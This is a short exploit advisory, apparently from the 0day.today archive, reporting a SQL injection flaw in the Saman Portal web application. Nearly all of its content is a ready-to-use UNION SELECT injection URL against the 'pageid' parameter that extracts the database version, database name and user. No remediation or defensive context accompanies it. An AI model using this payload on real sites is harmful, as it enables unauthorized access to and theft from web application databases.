id: 10743
date: 01/31/2010
title: Saman Portal Sql Injection Vulnerability
author: Pouya Daneshmand
cves: 

========================================
Saman Portal Sql Injection Vulnerability
========================================

#################################################################
# Application Info:
# Name: Saman Portal
# Vendor: http://www.sis-eg.com
#################################################################
Vulnerability:
http://site.com/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,null,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,null,14,15,16,17--
#################################################################



#  0day.today [2023-03-23]  #